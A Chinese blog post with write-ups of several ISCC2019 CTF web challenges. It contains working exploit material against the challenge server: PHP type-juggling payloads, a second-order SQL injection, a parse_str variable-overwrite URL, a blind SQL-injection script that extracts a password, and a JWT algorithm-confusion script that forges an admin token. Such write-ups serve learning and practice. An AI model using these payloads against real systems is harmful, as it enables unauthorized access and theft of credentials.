<!DOCTYPE html><html lang="zh-CN"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content="fzykn06's blog"><meta name="keywords" content="信安, 前端, 后端"><link rel="stylesheet" type="text/css" href="//fonts.loli.net/css?family=Source+Code+Pro"><link rel="stylesheet" type="text/css" href="/css/style.css?v=2.0.4"><link rel="stylesheet" type="text/css" href="/css/highlight.css?v=2.0.4"><link rel="Shortcut Icon" href="/favicon.ico"><link rel="bookmark" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><link rel="stylesheet" type="text/css" href="https://unpkg.com/gitalk/dist/gitalk.css?v=2.0.4"><title>ISCC2019部分题解 | fzykn06's blog</title><meta name="generator" content="Hexo 4.2.0"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">ISCC2019部分题解</h1><a id="logo" href="/.">fzykn06's blog</a><p class="description"></p></div><div id="nav-menu"><a href="/." class="current"><i class="fa fa-home"> 首页</i></a><a href="/archives/"><i class="fa fa-archive"> 归档</i></a><a href="/about/"><i class="fa fa-user"> 关于</i></a><a href="/atom.xml"><i class="fa fa-rss"> 订阅</i></a></div><div id="search-form"><div id="result-mask" class="hide"></div><label><input id="search-key" type="text" autocomplete="off" placeholder="搜索"></label><div id="result-wrap" class="hide"><div id="search-result"></div></div><div class="hide"><template id="search-tpl"><div class="item"><a href="/{path}" title="{title}"><div class="title">{title}</div><div class="time">{date}</div><div class="tags">{tags}</div></a></div></template></div></div></div><div id="layout" class="layout-g"><div class="layout-l"><div class="content_container"><div class="post"><h1 class="post-title">ISCC2019部分题解</h1><div class="post-meta"><a href="/2019/05/16/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/#comments" class="comment-count"></a><p><span class="date">May 16, 2019</span><span><i id="busuanzi_container_page_pv"><i id="busuanzi_value_page_pv"></i><i>点击</i></i></span></p></div><div class="post-content"><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>全程都在划水，只提供了几道思路，自己解出来的可能就是最简单的那一两道，然后就是靠各位师傅带我起飞，复现几道web和misc，其他二进制真的不会。。然后在这场比赛需要脑洞大开，flag形式也是变化不定，需要自己去猜格式</p>
<h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="web1"><a href="#web1" class="headerlink" title="web1"></a>web1</h3><p>题目链接：<a href="http://39.100.83.188:8001/" target="_blank" rel="noopener">http://39.100.83.188:8001/</a></p>
<p>进入链接直接就有了源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">require</span> <span class="string">'flag.php'</span>;</span><br><span class="line">$value = $_GET[<span class="string">'value'</span>];</span><br><span class="line">$password = $_GET[<span class="string">'password'</span>];</span><br><span class="line">$username = <span class="string">''</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> ($i = <span class="number">0</span>; $i &lt; count($value); ++$i) &#123;</span><br><span class="line">    <span class="keyword">if</span> ($value[$i] &gt; <span class="number">32</span> &amp;&amp; $value[$i] &lt; <span class="number">127</span>) <span class="keyword">unset</span>($value);</span><br><span class="line">    <span class="keyword">else</span> $username .= chr($value[$i]);</span><br><span class="line">    <span class="keyword">if</span> ($username == <span class="string">'w3lc0me_To_ISCC2019'</span> &amp;&amp; intval($password) &lt; <span class="number">2333</span> &amp;&amp; intval($password + <span class="number">1</span>) &gt; <span class="number">2333</span>) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'Hello '</span>.$username.<span class="string">'!'</span>, <span class="string">'&lt;br&gt;'</span>, PHP_EOL;</span><br><span class="line">        <span class="keyword">echo</span> $flag, <span class="string">'&lt;hr&gt;'</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br></pre></td></tr></table></figure>

<p>源码分析：</p>
<p>username=’w3lc0me_To_ISCC2019’是由value的值通过chr()函数拼接起来的，查询chr()函数的特性，chr()返回的是ASCII码，并且我们所输入的ASCII码要小于32或者大于127，否则就会被unset(),直接传入w3lc0me_To_ISCC2019，则对应的ASCII码会被unset，然后查看官方的chr()相关手册，发现chr()对传入的数字会进行 mod 256 运算，取余</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/1.png" alt></p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/2.png" alt><br>在官方手册的上方就可以看到ord()函数，发现ord()函数是chr()函数的反函数，所以考虑用脚本进行恢复</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">//以下脚本来自队友</span><br><span class="line">s=<span class="string">"w3lc0me_To_ISCC2019"</span></span><br><span class="line">values=<span class="string">""</span></span><br><span class="line">s1=<span class="string">"&amp;value[]="</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> s:</span><br><span class="line">    value = ord(i)+<span class="number">256</span></span><br><span class="line">    values=values + s1 + str(value)</span><br><span class="line"></span><br><span class="line">print(values)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">//获得的内容</span><br><span class="line">&amp;value[]=<span class="number">375</span>&amp;value[]=<span class="number">307</span>&amp;value[]=<span class="number">364</span>&amp;value[]=<span class="number">355</span>&amp;value[]=<span class="number">304</span>&amp;value[]=<span class="number">365</span>&amp;value[]=<span class="number">357</span>&amp;value[]=<span class="number">351</span>&amp;value[]=<span class="number">340</span>&amp;value[]=<span class="number">367</span>&amp;value[]=<span class="number">351</span>&amp;value[]=<span class="number">329</span>&amp;value[]=<span class="number">339</span>&amp;value[]=<span class="number">323</span>&amp;value[]=<span class="number">323</span>&amp;value[]=<span class="number">306</span>&amp;value[]=<span class="number">304</span>&amp;value[]=<span class="number">305</span>&amp;value[]=<span class="number">313</span></span><br></pre></td></tr></table></figure>

<p>解决了这个问题就还剩下后面的intval($password) &lt; 2333 &amp;&amp; intval($password + 1) &gt; 2333)，同样查看intval()函数的特性，当看到这条特性时:</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/4.png" alt></p>
<p>我们知道intval函数处理字符串时，会从头开始检测到除数字外的字母为止，而在代码中intval($password + 1) &gt; 2333,是先将$password + 1后再通过intval进行处理，那么如果我们传入的是十六进制数，例如0x10，那intval(‘0x10’)结果是0，而intval(‘0x10’+1)结果为17</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/6.png" alt></p>
<p>所以我们只要构造以下playload就可以啦：</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://<span class="number">39.100</span><span class="number">.83</span><span class="number">.188</span>:<span class="number">8001</span>/?&amp;<span class="keyword">value</span>[]=<span class="number">375</span>&amp;<span class="keyword">value</span>[]=<span class="number">307</span>&amp;<span class="keyword">value</span>[]=<span class="number">364</span>&amp;<span class="keyword">value</span>[]=<span class="number">355</span>&amp;<span class="keyword">value</span>[]=<span class="number">304</span>&amp;<span class="keyword">value</span>[]=<span class="number">365</span>&amp;<span class="keyword">value</span>[]=<span class="number">357</span>&amp;<span class="keyword">value</span>[]=<span class="number">351</span>&amp;<span class="keyword">value</span>[]=<span class="number">340</span>&amp;<span class="keyword">value</span>[]=<span class="number">367</span>&amp;<span class="keyword">value</span>[]=<span class="number">351</span>&amp;<span class="keyword">value</span>[]=<span class="number">329</span>&amp;<span class="keyword">value</span>[]=<span class="number">339</span>&amp;<span class="keyword">value</span>[]=<span class="number">323</span>&amp;<span class="keyword">value</span>[]=<span class="number">323</span>&amp;<span class="keyword">value</span>[]=<span class="number">306</span>&amp;<span class="keyword">value</span>[]=<span class="number">304</span>&amp;<span class="keyword">value</span>[]=<span class="number">305</span>&amp;<span class="keyword">value</span>[]=<span class="number">313</span>&amp;<span class="keyword">password</span>=<span class="number">0x91d</span></span><br></pre></td></tr></table></figure>

<p>flag{8311873e241ccad54463eaa5d4efc1e9}</p>
<h3 id="web2"><a href="#web2" class="headerlink" title="web2"></a>web2</h3><p>题目链接：<a href="http://39.100.83.188:8002/" target="_blank" rel="noopener">http://39.100.83.188:8002/</a></p>
<p>进入题目，发现是要爆破密码及绕过图片验证码,然后就在网上找了一个工具：PKAV HTTP Fuzzer 1.5.6，工具挺好使的，就是不分图片验证码会出现差错，但是调试一下就行啦</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/5.png" alt></p>
<p>先用bp抓包，获取报文头,放到工具中</p>
<figure class="highlight groovy"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">POST <span class="regexp">/login.php HTTP/</span><span class="number">1.1</span></span><br><span class="line"><span class="string">Host:</span> <span class="number">39.100</span><span class="number">.83</span><span class="number">.188</span>:<span class="number">8002</span></span><br><span class="line">Content-<span class="string">Length:</span> <span class="number">50</span></span><br><span class="line">Cache-<span class="string">Control:</span> max-age=<span class="number">0</span></span><br><span class="line"><span class="string">Origin:</span> <span class="string">http:</span><span class="comment">//39.100.83.188:8002</span></span><br><span class="line">Upgrade-Insecure-<span class="string">Requests:</span> <span class="number">1</span></span><br><span class="line">Content-<span class="string">Type:</span> application/x-www-form-urlencoded</span><br><span class="line">User-<span class="string">Agent:</span> Mozilla<span class="regexp">/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/</span><span class="number">537.36</span> (KHTML, like Gecko) Chrome<span class="regexp">/74.0.3729.131 Safari/</span><span class="number">537.36</span></span><br><span class="line"><span class="string">Accept:</span> text<span class="regexp">/html,application/</span>xhtml+xml,application<span class="regexp">/xml;q=0.9,image/</span>webp,image<span class="regexp">/apng,*/</span>*;q=<span class="number">0.8</span>,application/signed-exchange;v=b3</span><br><span class="line"><span class="string">Referer:</span> <span class="string">http:</span><span class="comment">//39.100.83.188:8002/</span></span><br><span class="line">Accept-<span class="string">Encoding:</span> gzip, deflate</span><br><span class="line">Accept-<span class="string">Language:</span> zh-CN,zh;q=<span class="number">0.9</span></span><br><span class="line"><span class="string">Cookie:</span> PHPSESSID=<span class="number">4</span>jc9sbpoccp81v7vnqg51ta124</span><br><span class="line"><span class="string">Connection:</span> close</span><br><span class="line"></span><br><span class="line">username=admin&amp;pwd=<span class="number">100</span>&amp;user_code=d2ic&amp;Login=submit</span><br></pre></td></tr></table></figure>

<p>查看源码，获得验证码的获取地址</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/7.png" alt></p>
<p>将地址放入工具中，进行调试：</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/8.png" alt></p>
<p>调试完成后进行密码和验证码标记,推荐一个字典生成工具–木头超级字典集</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/9.png" alt></p>
<p>然后就可以进行发包了：</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/10.png" alt></p>
<p>结束后进行长度排序，就可以看到密码是996</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/11.png" alt></p>
<p>拿到密码，就可以拿到flag啦</p>
<p>flag{996_ICU}</p>
<h3 id="web3"><a href="#web3" class="headerlink" title="web3"></a>web3</h3><p>题目链接：<a href="http://39.100.83.188:8065" target="_blank" rel="noopener">http://39.100.83.188:8065</a></p>
<p>sql-labs 24关原题，考察二次注入</p>
<p>注入点在login_create.php中的username字段，注册用户名为admin’#<br>之后登录admin’#，username字段就赋值给了session中的username字段</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/13.png" alt></p>
<p>在password_change.php中$username是直接从session中取出的，也就是取出的username为admin’#,拼接到sql语句中：</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UPDATE<span class="built_in"> users </span><span class="builtin-name">SET</span> <span class="attribute">PASSWORD</span>=<span class="string">'123'</span> where <span class="attribute">username</span>=<span class="string">'admin'</span>#' <span class="keyword">and</span> <span class="attribute">password</span>=<span class="string">'$curr_pass'</span></span><br></pre></td></tr></table></figure>

<p>admin用户的密码就被修改为123</p>
<p>但是在这题中没有设置容器，大家都在使用一个数据库，密码也在不断的被人改动，所以会出现改完密码后无法登陆的情况，并且数据库定期修改所有用户密码，所以稳定登陆的方法是不断的发送修改密码的包，如果admin’#用户被注册，可以增加多个#</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/12.png" alt></p>
<h3 id="web4"><a href="#web4" class="headerlink" title="web4"></a>web4</h3><p>题目链接：<a href="http://39.100.83.188:8066/" target="_blank" rel="noopener">http://39.100.83.188:8066/</a></p>
<p>进入即可获得源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">error_reporting(<span class="number">0</span>); </span><br><span class="line"><span class="keyword">include</span>(<span class="string">"flag.php"</span>); </span><br><span class="line">$hashed_key = <span class="string">'ddbafb4eb89e218701472d3f6c087fdf7119dfdd560f9d1fcbe7482b0feea05a'</span>; </span><br><span class="line">$parsed = parse_url($_SERVER[<span class="string">'REQUEST_URI'</span>]); </span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($parsed[<span class="string">"query"</span>]))&#123; </span><br><span class="line">    $query = $parsed[<span class="string">"query"</span>]; </span><br><span class="line">    $parsed_query = parse_str($query); </span><br><span class="line">    <span class="keyword">if</span>($parsed_query!=<span class="keyword">NULL</span>)&#123; </span><br><span class="line">        $action = $parsed_query[<span class="string">'action'</span>]; </span><br><span class="line">    &#125; </span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>($action===<span class="string">"auth"</span>)&#123; </span><br><span class="line">        $key = $_GET[<span class="string">"key"</span>]; </span><br><span class="line">        $hashed_input = hash(<span class="string">'sha256'</span>, $key); </span><br><span class="line">        <span class="keyword">if</span>($hashed_input!==$hashed_key)&#123; </span><br><span class="line">            <span class="keyword">die</span>(<span class="string">"&lt;img src='cxk.jpg'&gt;"</span>); </span><br><span class="line">        &#125; </span><br><span class="line"></span><br><span class="line">        <span class="keyword">echo</span> $flag; </span><br><span class="line">    &#125; </span><br><span class="line">&#125;<span class="keyword">else</span>&#123; </span><br><span class="line">    show_source(<span class="keyword">__FILE__</span>); </span><br><span class="line">&#125;<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这题的考察点在parse_str变量覆盖，在解析url之后会覆盖原来的变量所以构造<br>sha256($hash_key=1)=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b</p>
<p>所以构造playload：</p>
<figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">http:</span><span class="comment">//39.100.83.188:8066/?action=auth&amp;hashed_key=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b&amp;key=1</span></span><br></pre></td></tr></table></figure>

<p>flag{7he_rea1_f1@g_15_4ere}</p>
<h3 id="web5"><a href="#web5" class="headerlink" title="web5"></a>web5</h3><p>题目链接：<a href="http://39.100.83.188:8054/" target="_blank" rel="noopener">http://39.100.83.188:8054/</a></p>
<p>进去很奇怪的就一句话：</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/14.png" alt></p>
<p>队友脑洞打开吧，或者说是做得题目比较少，没那么快想到，在报文头部user-agent字段添加Union.373，然后回应报文会有请输入用户名，在post用户名username=admin回复报文请输入密码，再添加密码password=123，恢复成员密码就是flag</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/15.png" alt></p>
<p>看出是sql注入题，尝试普遍的注入方式，发现过滤了# （）extractvalue sleep and username password等</p>
<p>使用万能密码1’ or ‘1登录，发现有回显出用户名 union_373_Tom</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/16.png" alt></p>
<p>有回显使用联合注入的方式</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=union_373_Tom&amp;password=<span class="number">1</span>' union select <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span> or'</span><br></pre></td></tr></table></figure>

<p>但是因为过滤了括号，所以没办法继续子查询，于是参考下面这篇文章</p>
<p>参考文章<strong><em><a href="https://blog.csdn.net/nzjdsds/article/details/81879181" target="_blank" rel="noopener">https://blog.csdn.net/nzjdsds/article/details/81879181</a></em></strong></p>
<p>文章中提到可以进行union order by的方法进行盲注，思路简单而言就是通过 union 使查询结果为 union_373_Tom 和我们拼接上的一行查询结果通过 order by 对密码 password 字段进行排序，并根据回显的用户名信息来判断排序的结果，下面的是来自队友的本地测试结果：</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/17.png" alt></p>
<p>并且因为题目password字段需要闭合单引号，所以采用的是order by 3, ‘1，mysql会先根据逗号前面的进行排序，如果数据相等，则使用逗号后的进行排序</p>
<p>最后使用的盲注playload为：</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">username</span>=union_373_Tom&amp;password=<span class="number">1</span><span class="string">' or '</span><span class="number">1</span><span class="string">' union select 1,'</span>a<span class="string">', '</span><span class="number">1</span><span class="string">'  order by 3, '</span><span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>根据order by是对字符串一位一位的进行比较，所以思路就是对用户密码字段进行逐位进行排序比较，并且通过测试，是根据ASCII码值的大小，并且大小写字符排序相同，测试的字典为：</p>
<figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_ZzYyXxWwVvUuTtSsRrQqPpOoNnMmLlKkJjIiHhGgFfEeDdCcBbAa<span class="number">9876543210</span></span><br></pre></td></tr></table></figure>

<p>python脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests </span><br><span class="line">url = <span class="string">"http://39.100.83.188:8054"</span> </span><br><span class="line">headers = &#123; </span><br><span class="line">	<span class="string">'User-Agent'</span>:<span class="string">'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 Union.373'</span> </span><br><span class="line">	&#125;</span><br><span class="line">password = <span class="string">""</span> </span><br><span class="line">s = <span class="string">"_ZzYyXxWwVvUuTtSsRrQqPpOoNnMmLlKkJjIiHhGgFfEeDdCcBbAa9876543210 "</span> </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">33</span>): </span><br><span class="line">	<span class="keyword">for</span> j <span class="keyword">in</span> s: </span><br><span class="line">		p = password + j</span><br><span class="line">		data = &#123; </span><br><span class="line">			<span class="string">'username'</span>:<span class="string">'union_373_Tom'</span>, </span><br><span class="line">			<span class="string">'password'</span>:<span class="string">"1' or '1' union select 1,'hhx','"</span>+p+<span class="string">"' from admin order by 3,'1"</span> </span><br><span class="line">			&#125;</span><br><span class="line">		r = requests.post(url,data=data,headers=headers) </span><br><span class="line">		r.encoding = r.apparent_encoding </span><br><span class="line">		<span class="keyword">if</span> <span class="string">'hhx'</span> <span class="keyword">in</span> r.text: </span><br><span class="line">			password = password + j </span><br><span class="line">			print(<span class="string">'password:'</span>,password)</span><br><span class="line">			<span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/18.png" alt></p>
<p>最后密码为1SCC_2OI9</p>
<p>最后提交得到flag：<br>flag{1SCC_2OI9}</p>
<h3 id="web6"><a href="#web6" class="headerlink" title="web6"></a>web6</h3><p>题目链接：<a href="http://39.100.83.188:8053/" target="_blank" rel="noopener">http://39.100.83.188:8053/</a></p>
<p>注册账户，登录网页端抓包得到回复报文：</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/19.png" alt></p>
<p>但是在回复报文中只有一个token的值有用，将token进行解密</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/20.png" alt></p>
<p>发现是使用jwt生成的token，进入官网<strong><em><a href="https://jwt.io/" target="_blank" rel="noopener">https://jwt.io/</a></em></strong>进行解码，解码之后的格式分为三个部分</p>
<p>Header头部带有加密方式alg：RS256,类型typ：“JWT”</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/21.png" alt></p>
<p>Payload中是用户的信息</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/22.png" alt></p>
<p>签名字段使用 RSASHA256 分别对 header、payload、secret 进行加密。且 RSASHA256 为非对称加密需要 公钥与私钥进行解密</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/23.png" alt></p>
<p>查找前端源码，<a href="http://39.100.83.188:8053/static/js/common.js" target="_blank" rel="noopener">http://39.100.83.188:8053/static/js/common.js</a> 处发现 ajax 请求，验证头部身份认证。验证成功弹出文件路径。猜测需要构造 admin Token 进而得到admin 的 data.links</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/24.png" alt></p>
<p>在源码底部发现公钥公钥获取方式</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/25.png" alt></p>
<p>访问 url<a href="http://39.100.83.188:8053/pubkey/7D53337755615CEF7E90384692F85CFB" target="_blank" rel="noopener">http://39.100.83.188:8053/pubkey/7D53337755615CEF7E90384692F85CFB</a> 得到公钥</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="attr">"pubkey"</span>:<span class="string">"-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDMRTzM9ujkHmh42aXG0aHZk/PK\nomh6laVF+c3+D+klIjXglj7+/wxnztnhyOZpYxdtk7FfpHa3Xh4Pkpd5VivwOu1h\nKk3XQYZeMHov4kW0yuS+5RpFV1Q2gm/NWGY52EaQmpCNFQbGNigZhu95R2OoMtuc\nIC+LX+9V/mpyKe9R3wIDAQAB\n-----END PUBLIC KEY-----"</span>,<span class="attr">"result"</span>:<span class="literal">true</span>&#125;</span><br></pre></td></tr></table></figure>

<p>因为私钥无法获取到，所以这时我们就需要将算法修改为HS256,如果将算法从RS256更改为HS256，后端代码会使 用公钥作为秘密密钥，然后使用HS256算法验证签名。<br>生成认证字段的脚本如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> jwt </span><br><span class="line"><span class="keyword">import</span> base64 </span><br><span class="line">public = open(<span class="string">'1.txt'</span>, <span class="string">'r'</span>).read()</span><br><span class="line"><span class="keyword">print</span> jwt.encode(&#123;<span class="string">"name"</span>: <span class="string">"iscc19"</span>,<span class="string">"priv"</span>: <span class="string">"admin"</span>&#125;, key=public,algorithm=<span class="string">'HS256'</span>)</span><br></pre></td></tr></table></figure>

<p>需要将网页上获得的公钥中 \n 替换成换行，并且这里 priv 之前是为 other ，需要修改为 admin 身份，用户名 name 猜测为之前认证字段的 iscc19</p>
<p>需要额外在python2环境下安装 jwt 模块： pip install PyJWT<br>运行时候需要对 algorithms.py 中 prepare_key 中非法字符注释，否则程序报错。</p>
<p>运行脚本获得字符串 </p>
<figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">eyJhbGciOiJIUzI<span class="number">1</span><span class="symbol">NiIsInR5</span>cCI<span class="number">6</span>IkpX<span class="attr">VCJ9</span>.eyJuYW<span class="number">1</span>lIjoiaX<span class="symbol">NjYzE5</span>IiwicHJpdiI<span class="number">6</span>ImFkbWluI<span class="symbol">n0</span>.bEza<span class="number">2</span>gXi<span class="number">7</span>_q<span class="number">9</span>qPFTSgbu<span class="number">8</span>wWRpmHqHd<span class="number">1</span>FFa-rJKY_<span class="number">38</span>c</span><br></pre></td></tr></table></figure>

<p>带入即可获取 admin 信息</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/26.png" alt></p>
